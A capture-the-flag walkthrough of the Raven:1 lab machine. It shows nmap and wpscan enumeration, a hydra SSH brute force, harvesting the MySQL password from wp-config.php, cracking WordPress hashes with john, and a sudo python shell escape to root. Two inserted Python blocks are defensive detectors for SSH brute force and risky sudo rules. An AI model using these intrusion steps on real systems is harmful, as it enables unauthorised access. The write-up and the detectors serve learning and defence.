Introduction
Raven is a beginner/intermediate boot2root machine. There are four flags to find and two intended ways to get root.
Built with VMware and tested on VirtualBox. Configured to use NAT networking.
Name: Raven:1
Date: 14 August 2018
Author: William McCann
Series: Raven
Information gathering
Query network information with nmap.
Network information

```
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 13:24 CST
Nmap scan report for Sec.lan (192.168.123.1)
Nmap scan report for 192.168.123.75
Host is up (0.00025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
MAC Address: 08:00:27:D9:1A:26 (Oracle VirtualBox virtual NIC)
```
Target address found

```
$ nmap -A -p- -sS 192.168.123.75
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 13:24 CST
Nmap scan report for Raven.lan (192.168.123.75)
Host is up (0.00044s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 42655/tcp status
|_ 100024 1 48893/udp status
42655/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:D9:1A:26 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Application information
Opening the site directly shows a static page, so I enumerate directories with dirb.

```
$ dirb http://192.168.123.75
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Nov 8 13:26:25 2018
URL_BASE: http://192.168.123.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.75/ ----
==> DIRECTORY: http://192.168.123.75/css/
==> DIRECTORY: http://192.168.123.75/fonts/
==> DIRECTORY: http://192.168.123.75/img/
+ http://192.168.123.75/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://192.168.123.75/js/
==> DIRECTORY: http://192.168.123.75/manual/
+ http://192.168.123.75/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.123.75/vendor/
==> DIRECTORY: http://192.168.123.75/wordpress/
```
- Found a WordPress site, but when I opened it through the IP address it did not work properly.
- Map the domain named in the error to the target:

```
192.168.123.75 raven.local
```

- Opening http://raven.local/ now works normally.
Next, use wpscan to enumerate the WordPress installation.

```
$ wpscan --url http://raven.local/wordpress/ --enumerate p -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.3.2
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://raven.local/wordpress/
[+] Started: Thu Nov 8 13:50:24 2018
Interesting Finding(s):
[+] http://raven.local/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://raven.local/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
[+] Enumerating Users
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] michael
| Detected By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] steven
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
```
- This turns up a range of information; the important part is the two users, michael and steven. I chose to try brute-forcing the SSH and WordPress passwords.
SSH brute force
Save the two usernames above as icekam.txt and brute-force with hydra.

```
$ hydra -L icekam.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.123.75
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 13:53:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:14344399), ~1793050 tries per task
[DATA] attacking ssh://192.168.123.75:22/
[22][ssh] host: 192.168.123.75 login: michael password: michael
```
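The defender's side of the same step, as an added example that is not part of the original write-up: the hydra run above lands on the target as a burst of sshd "Failed password" lines for a small set of usernames from one source, so a detector only needs to count failures per source inside a time window and note whether a login from that source later succeeded. The auth.log lines, PIDs and the second source address below are constructed samples.

```python
import re
from collections import defaultdict
from datetime import datetime

# Debian sshd syslog format (timestamp carries no year); failed and accepted logins.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)
# Constructed sample: 192.168.123.50 sprays two real users plus an invalid one and then
# gets in; 192.168.123.20 is a normal user who mistyped once. PIDs and IPs are made up.
SAMPLE_LOG = """\
Nov  8 13:53:01 raven sshd[1201]: Failed password for michael from 192.168.123.50 port 40110 ssh2
Nov  8 13:53:01 raven sshd[1202]: Failed password for steven from 192.168.123.50 port 40111 ssh2
Nov  8 13:53:02 raven sshd[1203]: Failed password for invalid user admin from 192.168.123.50 port 40112 ssh2
Nov  8 13:53:02 raven sshd[1204]: Failed password for michael from 192.168.123.50 port 40113 ssh2
Nov  8 13:53:03 raven sshd[1205]: Failed password for steven from 192.168.123.50 port 40114 ssh2
Nov  8 13:53:04 raven sshd[1207]: Accepted password for michael from 192.168.123.50 port 40116 ssh2
Nov  8 14:10:00 raven sshd[1300]: Failed password for michael from 192.168.123.20 port 51000 ssh2
Nov  8 14:10:30 raven sshd[1301]: Accepted password for michael from 192.168.123.20 port 51001 ssh2
"""

def parse_events(log_text, year=2018):
    """Yield (timestamp, ip, user, failed) for each sshd password event; other lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], m["result"] == "Failed"

def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Flag source IPs with >= threshold failures inside any window_seconds span.
    A later accepted login from a flagged source means the guessing worked."""
    by_ip = defaultdict(list)
    for ev in parse_events(log_text):
        by_ip[ev[1]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = sorted(e[0] for e in evs if e[3])
        j, burst = 0, False  # j trails i so that fails[j..i] all lie within the window
        for i, t in enumerate(fails):
            while (t - fails[j]).total_seconds() > window_seconds:
                j += 1
            burst = burst or (i - j + 1 >= threshold)
        if burst:
            users = sorted({e[2] for e in evs if e[3]})
            got_in = any(not e[3] and e[0] >= fails[0] for e in evs)
            alerts[ip] = {"failures": len(fails), "users": users, "success_after_burst": got_in}
    return alerts
```

Run against a real `/var/log/auth.log`, the `success_after_burst` flag is the entry to act on first: that account's password has been guessed.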
Try logging in:

```
$ ssh michael@192.168.123.75
The authenticity of host '192.168.123.75 (192.168.123.75)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.123.75' (ECDSA) to the list of known hosts.
michael@192.168.123.75's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:/$ ls
```
```
converted 'https://codeload.github.com/rebootuser/LinEnum/zip/master' (ANSI_X3.4-1968) -> 'https://codeload.github.com/rebootuser/LinEnum/zip/master' (UTF-8)
--2018-11-09 01:21:06-- https://codeload.github.com/rebootuser/LinEnum/zip/master
Resolving codeload.github.com (codeload.github.com)... 54.251.140.56, 13.250.162.133, 13.229.189.0
Connecting to codeload.github.com (codeload.github.com)|54.251.140.56|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: 'master'
master [ <=> ] 14.47K --.-KB/s in 0.09s
2018-11-09 01:21:06 (156 KB/s) - 'master' saved [14816]
michael@Raven:/tmp$ ls
master
michael@Raven:/tmp$ unzip master
Archive: master
b6e55a80654c6a701ddd5fc76f104938023cdbb4
creating: LinEnum-master/
inflating: LinEnum-master/CHANGELOG.md
inflating: LinEnum-master/CONTRIBUTORS.md
inflating: LinEnum-master/LICENSE
inflating: LinEnum-master/LinEnum.sh
inflating: LinEnum-master/README.md
michael@Raven:/tmp$ cd LinEnum-master/
michael@Raven:/tmp/LinEnum-master$ ls
CHANGELOG.md CONTRIBUTORS.md LICENSE LinEnum.sh README.md
michael@Raven:/tmp/LinEnum-master$ ./LinEnum.sh
```
Privilege escalation
Running LinEnum directly turned up nothing useful, so I chose to switch to the MySQL user and try again.
mysql
Open the configuration file to look up the MySQL user credentials.

```
michael@Raven:/var/www/html/wordpress$ cat wp-config.php
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
```
Log in and view the user hashes:

```
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql> use wordpress;
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
```
- Found the hashes; I saved them as icekamwp.txt and cracked them directly with john.

```
$ john icekamwp.txt
steven:pink84
```
System
The crack succeeded, so switch user and run LinEnum again.

```
michael@Raven:/var/www/html/wordpress$ su steven
Password:
$ /bin/bash
steven@Raven:/var/www/html/wordpress$ cd /tmp
steven@Raven:/tmp$ ls
LinEnum-master master
steven@Raven:/tmp$ cd LinEnum-master/
steven@Raven:/tmp/LinEnum-master$ ls
CHANGELOG.md CONTRIBUTORS.md LICENSE LinEnum.sh README.md
steven@Raven:/tmp/LinEnum-master$ ./LinEnum.sh
[+] We can sudo without supplying a password!
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
[+] Possible sudo pwnage!
/usr/bin/python
```
```
steven@Raven:/tmp/LinEnum-master$ sudo /usr/bin/python
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('/bin/bash')
root@Raven:/tmp/LinEnum-master# ls
CHANGELOG.md CONTRIBUTORS.md LICENSE LinEnum.sh README.md
root@Raven:/tmp/LinEnum-master# cd
root@Raven:~# ls
flag4.txt
root@Raven:~# cat flag4.txt
flag4{715dea6c055b9fe3337544932f2941ce}
```
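The `sudo -l` output LinEnum printed above is the finding an administrator needs to catch before anyone else does: a NOPASSWD rule for an interpreter is a root grant. As an added example (not from the original write-up), the script below parses that output format and rates each rule; the sample is constructed after the block above, with a `service` rule and an `ALL` rule added so the benign and the worst case are both exercised.

```python
import re
# Programs that yield a root shell or arbitrary code execution when run under sudo
# with caller-controlled arguments; a NOPASSWD rule for one of them is a root grant.
SHELL_CAPABLE = {"python", "python2", "python3", "perl", "ruby", "bash", "sh", "dash",
                 "zsh", "vim", "vi", "less", "more", "find", "awk", "env"}
HEADER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):")
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")
# Constructed sample modelled on the `sudo -l` block above; the `service` and `ALL` rules
# are added so that the benign and the worst case are both exercised.
SAMPLE_SUDO_L = """\
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
    (root) /usr/sbin/service apache2 restart
    (ALL) NOPASSWD: ALL
"""

def parse_sudo_l(text):
    """Return (user, rules) from `sudo -l` output; each rule is one command with its runas and tags."""
    user, rules = None, []
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            user = h["user"]
            continue
        m = RULE_RE.match(line)
        if user and m:  # only lines after the header are command rules
            tags = set(re.findall(r"(\w+):", m["tags"]))
            for cmd in m["cmds"].split(","):
                rules.append({"runas": m["runas"], "nopasswd": "NOPASSWD" in tags, "command": cmd.strip()})
    return user, rules

def audit(rules):
    """Rate rules that are root-equivalent; the reason says what to change."""
    findings = []
    for r in rules:
        parts = r["command"].split()
        prog = parts[0].rsplit("/", 1)[-1]
        worst = "CRITICAL" if r["nopasswd"] else "HIGH"
        if r["command"] == "ALL":
            sev, why = worst, "unrestricted command set"
        elif prog in SHELL_CAPABLE and len(parts) == 1:
            sev, why = worst, f"{prog} with free arguments spawns a root shell; pin to a fixed script or drop the rule"
        elif prog in SHELL_CAPABLE:
            sev, why = "MEDIUM", f"{prog} is pinned to arguments; verify the script is root-owned and not writable"
        else:
            continue
        findings.append({"severity": sev, "runas": r["runas"], "command": r["command"], "reason": why})
    return findings
```

Feed it the output of `sudo -l` for each account during a build review, or the rendered `sudo -l -U <user>` for every user in a host audit.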
- Got root and the flag, but searching did not turn up the rest, which is a bit awkward.

```
root@Raven:/# find -name flag*.txt
./var/www/flag2.txt
./root/flag4.txt
```
Takeaways
This environment is fairly basic and can be taken down quickly!